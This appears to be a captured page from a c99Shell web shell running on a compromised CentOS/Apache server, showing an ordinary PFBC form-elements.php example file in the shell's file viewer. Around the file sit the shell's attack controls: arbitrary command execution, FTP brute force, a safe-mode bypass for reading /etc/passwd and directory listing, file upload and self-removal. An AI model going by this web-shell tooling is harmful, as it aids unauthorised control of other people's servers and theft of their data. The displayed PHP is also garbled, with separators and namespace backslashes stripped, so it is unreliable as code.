!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/examples/   drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     form-elements.php (9.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
use PFBCForm;
use 
PFBCElement;

session_start();
error_reporting(E_ALL);
include(
"../PFBC/Form.php");

if(isset(
$_POST["form"])) {
    
Form::isValid($_POST["form"]);
    
header("Location: " $_SERVER["PHP_SELF"]);
    exit();    
}

include(
"../header.php");
$version file_get_contents("../version");
?>
<div class="page-header">
    <h1>Form Elements</h1>
</div>

<p>PFBC has support for 32 form elements: Button, Captcha, Checkbox, Checksort, CKEditor, 
Color, Country, Date, DateTimeLocal, DateTime, Email, File, Hidden, HTML, jQueryUIDate, Month,
Number, Password, Phone, Radio, Range, Search, Select, Sort, State, Textarea, Textbox, Time,
TinyMCE, Url, Week, YesNo.</p>

<p><span class="label label-important">Important</span> In each of the example forms provided, you'll
notice that the form's prevent property is set to an array containing "bootstrap" and "jQuery".  This prevents
the css/js include files from being loaded a second time by PFBC as they're already being included in a header
file.  If your system already includes jQuery or bootstrap, it's recommended that you edit the prevent
property in PFBC/Form.php so you don't have to set it (the prevent property) each time you create a form.</p>

<?php
$options 
= array("Option #1""Option #2""Option #3");
$form = new Form("form-elements");
$form->configure(array(
    
"prevent" => array("bootstrap""jQuery")
));
$form->addElement(new ElementHidden("form""form-elements"));
$form->addElement(new ElementHTML('<legend>Standard</legend>'));
$form->addElement(new ElementTextbox("Textbox:""Textbox"));
$form->addElement(new ElementPassword("Password:""Password"));
$form->addElement(new ElementFile("File:""File"));
$form->addElement(new ElementTextarea("Textarea:""Textarea"));
$form->addElement(new ElementSelect("Select:""Select"$options));
$form->addElement(new ElementRadio("Radio Buttons:""RadioButtons"$options));
$form->addElement(new ElementCheckbox("Checkboxes:""Checkboxes"$options));
$form->addElement(new ElementHTML('<legend>HTML5</legend>'));
$form->addElement(new ElementPhone("Phone:""Phone"));
$form->addElement(new ElementSearch("Search:""Search"));
$form->addElement(new ElementUrl("Url:""Url"));
$form->addElement(new ElementEmail("Email:""Email"));
$form->addElement(new ElementDate("Date:""Date"));
$form->addElement(new ElementDateTime("DateTime:""DateTime"));
$form->addElement(new ElementDateTimeLocal("DateTime-Local:""DateTimeLocal"));
$form->addElement(new ElementMonth("Month:""Month"));
$form->addElement(new ElementWeek("Week:""Week"));
$form->addElement(new ElementTime("Time:""Time"));
$form->addElement(new ElementNumber("Number:""Number"));
$form->addElement(new ElementRange("Range:""Range"));
$form->addElement(new ElementColor("Color:""Color"));
$form->addElement(new ElementHTML('<legend>jQuery UI</legend>'));
$form->addElement(new ElementjQueryUIDate("Date:""jQueryUIDate"));
$form->addElement(new ElementChecksort("Checksort:""Checksort"$options));
$form->addElement(new ElementSort("Sort:""Sort"$options));
$form->addElement(new ElementHTML('<legend>WYSIWYG Editor</legend>'));
$form->addElement(new ElementTinyMCE("TinyMCE:""TinyMCE"));
$form->addElement(new ElementCKEditor("CKEditor:""CKEditor"));
$form->addElement(new ElementHTML('<legend>Custom/Other</legend>'));
$form->addElement(new ElementState("State:""State"));
$form->addElement(new ElementCountry("Country:""Country"));
$form->addElement(new ElementYesNo("Yes/No:""YesNo"));
$form->addElement(new ElementCaptcha("Captcha:"));
$form->addElement(new ElementButton);
$form->addElement(new ElementButton("Cancel""button", array(
    
"onclick" => "history.go(-1);"
)));
$form->render();
?>

<ul class="nav nav-tabs">
    <li class="active"><a href="#php53" data-toggle="tab">PFBC <?php echo $version?> (PHP 5 >= 5.3.0)</a></li>
    <li><a href="#php5" data-toggle="tab">PFBC <?php echo $version?> (PHP 5)</a></li>
</ul>

<div class="tab-content">
    <div id="php53" class="tab-pane active">

<?php
prettyprint
('<?php
use PFBC\Form;
use PFBC\Element;

$options = array("Option #1", "Option #2", "Option #3");

include("PFBC/Form.php");
$form = new Form("form-elements");
$form->configure(array(
    "prevent" => array("bootstrap", "jQuery")
));
$form->addElement(new Element\Hidden("form", "form-elements"));
$form->addElement(new Element\HTML(\'<legend>Standard</legend>\'));
$form->addElement(new Element\Textbox("Textbox:", "Textbox"));
$form->addElement(new Element\Password("Password:", "Password"));
$form->addElement(new Element\File("File:", "File"));
$form->addElement(new Element\Textarea("Textarea:", "Textarea"));
$form->addElement(new Element\Select("Select:", "Select", $options));
$form->addElement(new Element\Radio("Radio Buttons:", "RadioButtons", $options));
$form->addElement(new Element\Checkbox("Checkboxes:", "Checkboxes", $options));
$form->addElement(new Element\HTML(\'<legend>HTML5</legend>\'));
$form->addElement(new Element\Phone("Phone:", "Phone"));
$form->addElement(new Element\Search("Search:", "Search"));
$form->addElement(new Element\Url("Url:", "Url"));
$form->addElement(new Element\Email("Email:", "Email"));
$form->addElement(new Element\Date("Date:", "Date"));
$form->addElement(new Element\DateTime("DateTime:", "DateTime"));
$form->addElement(new Element\DateTimeLocal("DateTime-Local:", "DateTimeLocal"));
$form->addElement(new Element\Month("Month:", "Month"));
$form->addElement(new Element\Week("Week:", "Week"));
$form->addElement(new Element\Time("Time:", "Time"));
$form->addElement(new Element\Number("Number:", "Number"));
$form->addElement(new Element\Range("Range:", "Range"));
$form->addElement(new Element\Color("Color:", "Color"));
$form->addElement(new Element\HTML(\'<legend>jQuery UI</legend>\'));
$form->addElement(new Element\jQueryUIDate("Date:", "jQueryUIDate"));
$form->addElement(new Element\Checksort("Checksort:", "Checksort", $options));
$form->addElement(new Element\Sort("Sort:", "Sort", $options));
$form->addElement(new Element\HTML(\'<legend>WYSIWYG Editor</legend>\'));
$form->addElement(new Element\TinyMCE("TinyMCE:", "TinyMCE"));
$form->addElement(new Element\CKEditor("CKEditor:", "CKEditor"));
$form->addElement(new Element\HTML(\'<legend>Custom/Other</legend>\'));
$form->addElement(new Element\State("State:", "State"));
$form->addElement(new Element\Country("Country:", "Country"));
$form->addElement(new Element\YesNo("Yes/No:", "YesNo"));
$form->addElement(new Element\Captcha("Captcha:"));
$form->addElement(new Element\Button);
$form->addElement(new Element\Button("Cancel", "button", array(
    "onclick" => "history.go(-1);"
)));
$form->render();'
);
?>

    </div>
    <div id="php5" class="tab-pane">

<?php
prettyprint
('<?php
$options = array("Option #1", "Option #2", "Option #3");

include("PFBC/Form.php");
$form = new Form("form-elements");
$form->configure(array(
    "prevent" => array("bootstrap", "jQuery")
));
$form->addElement(new Element_Hidden("form", "form-elements"));
$form->addElement(new Element_HTML(\'<legend>Standard</legend>\'));
$form->addElement(new Element_Textbox("Textbox:", "Textbox"));
$form->addElement(new Element_Password("Password:", "Password"));
$form->addElement(new Element_File("File:", "File"));
$form->addElement(new Element_Textarea("Textarea:", "Textarea"));
$form->addElement(new Element_Select("Select:", "Select", $options));
$form->addElement(new Element_Radio("Radio Buttons:", "RadioButtons", $options));
$form->addElement(new Element_Checkbox("Checkboxes:", "Checkboxes", $options));
$form->addElement(new Element_HTML(\'<legend>HTML5</legend>\'));
$form->addElement(new Element_Phone("Phone:", "Phone"));
$form->addElement(new Element_Search("Search:", "Search"));
$form->addElement(new Element_Url("Url:", "Url"));
$form->addElement(new Element_Email("Email:", "Email"));
$form->addElement(new Element_Date("Date:", "Date"));
$form->addElement(new Element_DateTime("DateTime:", "DateTime"));
$form->addElement(new Element_DateTimeLocal("DateTime-Local:", "DateTimeLocal"));
$form->addElement(new Element_Month("Month:", "Month"));
$form->addElement(new Element_Week("Week:", "Week"));
$form->addElement(new Element_Time("Time:", "Time"));
$form->addElement(new Element_Number("Number:", "Number"));
$form->addElement(new Element_Range("Range:", "Range"));
$form->addElement(new Element_Color("Color:", "Color"));
$form->addElement(new Element_HTML(\'<legend>jQuery UI</legend>\'));
$form->addElement(new Element_jQueryUIDate("Date:", "jQueryUIDate"));
$form->addElement(new Element_Checksort("Checksort:", "Checksort", $options));
$form->addElement(new Element_Sort("Sort:", "Sort", $options));
$form->addElement(new Element_HTML(\'<legend>WYSIWYG Editor</legend>\'));
$form->addElement(new Element_TinyMCE("TinyMCE:", "TinyMCE"));
$form->addElement(new Element_CKEditor("CKEditor:", "CKEditor"));
$form->addElement(new Element_HTML(\'<legend>Custom/Other</legend>\'));
$form->addElement(new Element_State("State:", "State"));
$form->addElement(new Element_Country("Country:", "Country"));
$form->addElement(new Element_YesNo("Yes/No:", "YesNo"));
$form->addElement(new Element_Captcha("Captcha:"));
$form->addElement(new Element_Button);
$form->addElement(new Element_Button("Cancel", "button", array(
    "onclick" => "history.go(-1);"
)));
$form->render();'
);
?>

    </div>
</div>

<?php
include("../footer.php");

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.015 ]--